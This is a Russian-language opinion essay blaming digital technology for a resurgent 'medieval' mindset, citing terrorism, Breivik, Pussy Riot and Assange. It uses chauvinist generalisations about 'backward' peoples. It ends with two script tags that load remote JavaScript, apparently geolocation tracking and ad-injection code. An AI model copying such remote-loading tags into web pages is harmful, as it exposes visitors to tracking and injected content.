Ответственность за Средневековье

На модерации Отложенный

…Да, именно оно, вылезшее из саклей и землянок, спустившееся с гор и бредущее из пустынь, ринулось оно навстречу новому тысячелетию, оно – распоясавшееся, окрыленное, обезумевшее Средневековье!

Астрономическое наступление новой эры в 2000 году, громогласно провозглашенное главой гегемонов «цифровым тысячелетием», меньше чем через год ознаменовалось на земле гегемона невиданным по масштабу и чудовищности терактом и далее – последовавшей за ним чередой человеческих жертвоприношений, казней заложников, волной терактов в европейских столицах, такой же нескончаемой чередой терактов в странах Ближнего Востока, и массовыми ритуальными убийствами в ничем не повинных людей, увенчанных чудовищным злодеянием Брейвика, совершенным якобы во имя некой мессианской цели…

Арабская весна, организованная по флешмобам, нынешняя провокация, спровоцированная просмотром любительского видео в интернете, как это всё вяжется с технологическим прорывом человечества в светлое цифровое будущее? Или как, к примеру, вяжется лютая реакцией на глупое интернет-видео «пуссек» части представителей нашей просвещенной в недавнем страны, желающих прямо в камеру с экрана телевизора «отрезать им с…ьки»? Что происходит на самом деле с человеческой популяцией? В какую такую адскую карусель она себя затягивает у нас на глазах?

Однажды мой старый знакомый, it-шный босс среднего масштаба, после пары рюмок черной водки (да, именно черной) сказал мне полушепотом: «Знай, когда сказка становится былью, люди начинает нервничать». Глубину его черноводочного откровения я понимаю сейчас. Люди начинают не то, что нервничать, люди начинают сходить с ума. Да, сегодняшние уже привычные нам дивайсы и гаджеты, интернет и 3D-игры, изобретенные в тиши лабораторий яйцеголовыми представителями человеческой расы на новом витке длительного мыслительного процесса, свершавшего в умах их предшественников в течении последних двух веков, так вот все эти чудеса техники стали той самой сказкой, которая и обратилась былью – приятной на ощупь, поющей неземными голосами, говорящей человеческим голосом, играющей всеми цветами радуги, думающей быстрее и знающей больше, чем все твои соседи вместе взятые. И вот все эти «лампы Аладдина», волшебные зеркальца и волшебные палочки, которые мечтательное человечество чаяло последние лет тысяч семь, стали вроде уже не удивляющей ничем обыденностью, как топор, сабля, гвоздь, колесо, телега, мул, автомат Калашникова, но вызывающие сильное нервное возбуждение где-то внутри. Средневековье, забитое грохотом и ревом индустриальной эпохи, вдруг, в постиндустриальную эру, нежданно негаданно для себя узрело, что все его первобытные страхи, что всё его упрямое невежество, что вся его лень к познанию и нелюбовь к прогрессу, и, конечно же, все его истовые молитвы и посты, все это дало свои плоды – высшие силы, наконец, вложили в его руки волшебные инструменты, и теперь можно потыкать в нужные кнопочки на волшебном зеркальце и толпы средневековых собратьев узнают, что в таком-то месте в такой час нужно свершить праведный суд над шайтанами, над нехристями, над гяурами, над пиндосами, над черномазыми, над бледнолицыми… Можно нажать кнопочку на маленькой штучке и поднять на воздух битком набитое нелюдями огромное здание, а заодно и себя, чтобы улететь в рай…

Арабская весна, как и нынешняя арабская осень – эти проявления заклокотавшего в человеке средневековья, рядоположены с массовой казнью Брейвика, со сливами Асанжа и его последующим преследованием, наконец, с нашумевшим панк-молебнем юродствующих «пуссек» и последовавшим за ним средневековым судом с апелляциями к правилам Трулльского собора конца VII века… И всё это результаты игр с чудесными дивайсами и гаджетами. А каких бездарных богохульствах «пуссек» или бездарных фильмах-памфлетах о мусульманах узнал бы мир, если бы у каждого из нас не находился теперь дома свой мини-телецентр в виде одного компьютера, подключенного к глобальной Сети…? И вот наше средневековое сознание, получив такой чудо-инструмент (для кого – божественный, для кого – дьявольский), хочет свершить некий сверхъестественный акт – потрясти мир, не выходя из собственной комнаты. «Пуссек» по-инквизиторски упекли за решетку, после того как они своим средневековым анти-молебнем всколыхнули в массах людей самые неприглядные средневековые инстинкты с желанием их вешать, сажать на кол, колесовать, отрезать им части тел, в лучшем случае, морить голодом. Ассанжа или посадят в Америке, либо он будет всю жизнь скрываться под крылом диктаторов банановых республик, пока его не отправят на ужин вождю. Что получилось с заморским псевдо-фильмом о пророке, мы круглые сутки видим и читаем в СМИ…

Когда гении-изобретатели в сверхсекретных лабораториях создавали ядерную бомбу, и они, и их заказчики, не сомневались в том, что плоды их труда останутся сверхсекретными навсегда, охраняемые всей мощью государственной власти. Слишком очевидной была брутальная разрушительность этих их «гаджетов». Но когда радиотелефон и всемирная сеть с видеохостингом стали всеобщим достоянием, никаким властям не пришло в голову, что по своей силе они выпустили из таких же сверхсекретных центров информационное ружеи, равное тысячам мегатонных бомб… В погоне за оруэлловским контролем над обществом посредством соцсетей и спутниковым слежением, в погоне за сверхприбылями от продаж электронных игрушек, «Большой брат» забыл о разнице в культурном развитии населения разных частей планеты, измеряемой условными веками и даже тысячелетиями.

Есть малочисленные племена, живущие в первобытную эпоху, где-то в Х тысячелетии до н.э., есть страны и народы, живущие, кто в V, кто в X, а кто подтянулся – уже и в XV-XIV веках, а кто уже и перепрыгнул аж в XVIII век. И лишь меньшинство, не больше полутора миллиардов, может претендовать на право именовать себя детьми XXI века.

Покойный гений Стив Джобс привел свои игрушки к формам использования, возвращающих нас к дописьменной эпохе: человек, словно дикарь, рисуя пальцем по песку, двигает значками-картинками, напоминающими рисунки на бивнях мамонтов, – тыкает пальцем и слышит голос, тыкаем и видит говорящую с ним голову. Только, если перед глазами первобытного homoerectus рисунки на бивнях оживали после доброй порции съеденного галлюциногена, современному представителю средневековья эти волшебные превращения даются без каких-либо психотропных стимуляторов, став обыкновенным чудом, заслуженно ниспосланным ему свыше за праведные мысли и дела, а главное, за праведный гнев на яйцеголовых дьяволов, изготовивших и тайно управляющих всеми этими штуковинами… Как работает чудо, для него, средневекового, всегда останется тайной, да и не интересно ему, а вот то, что джины из «долины шайтана», словно наш любимец Кощей Бессмертный из своего замка, управляют издалека волшебными палочками – это он уже усвоил хорошо. Неееет, говорит себе наш средневековый современник, не зря я бился об пол и постился, чтобы высшая сила не помогла мне долететь на ковре-бомбомете до долины дьявола, дабы повергнуть обратить ее в геенну огненную…

Наше семимиллиардное человечество (не считая еще парочки миллиардов «неучтенки»), как показывает нам жизнь, одной ногой еще очень глубоко стоит в тине средневековья, а второй лишь делает первый мучительный шажок, чтобы ступить на твердую почву мало-мальски адекватного восприятия реальности… Как-то, лет семь назад, в одной культовой книжице, принадлежащей перу двух шведских экономических гуру, я прочитал о том, что в 2005 году добрая половина человечества еще не знала, что такое телефон! Помню, это утверждение потрясло меня. Мне стало искренне жаль эту бедную и несчастную половину человечества. Не знаю, что говорит сегодняшняя статистика по этому поводу, но сейчас нам остается мечтать, чтобы как можно дольше оставшаяся часть неоцифрованного человечества не получила ни смартфоны, ни планшетники, ни интернеты, ни изернеты… Проводной телефон с дисковым циферблатом – вот тот максимум, на который можно решиться. А дальше долгая миссионерская работа, нудно и доходчиво объясняющая, что такое связь, зачем она нужна, и что придумали ее не божества и не демоны, а такие же, как они люди из мяса и костей. Ведь безоглядно отдавая в руки средневековых масс чудеса техники, цивилизация сама обрекает себя на то, чтобы в конечном итоге ввести драконовские ограничения по их применению. Неровен час и правительства «Большой двадцатки» придут к решению запретить использование сотовой связи и доступ в интернет без специальных персональных разрешений, выдаваемых спецслужбами вместе с психиатрами, по аналогии с правами на вождение автомобиля или разрешениями на владения огнестрельным оружием. Джин, увы, из бутылки выпущен. Сможет ли наша современная цивилизация загнать его обратно, покажет сила нашего коллективного разума. Но именно те, кто ответственны за творящийся разгул средневековья, они же обязаны первыми начать решать эту глобальную проблему. И сегодня в пору ратовать не за преодоление цифрового неравенства в мире, а за его очень тщательное и продуманное регулирование. От того, как человечество справиться с этим первым глобальным вызовом – лобовым столкновением в одно историческое время разных исторических эпох, – будет зависеть и появление у нас морального права на практическое внедрение в жизнь квантового компьютера, холодного ядерного синтеза, антигравитации, машины времени и прочих будущих чудес научно-технического прогресса…

На могиле полковника Кольта написаны всем известные слова: «Господь Бог создал людей, а полковник Кольт сделал их равными». Сегодня мы наблюдаем, как по всему миру на фоне арабских бунтов против родины полковника, идет презентация айфона-5, первого яблочно сматрфона, выпущенного после смерти Джобса. Останки гения сожжены, прах его развеян, но в руках миллионов людей остаются миллионы его изумительных гаджетов, и, наверное, есть смысл на каждом из них написать: «Эволюция сделала обезьяну человеком, а Стив Джобс вернул человека в первобытный рай».

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>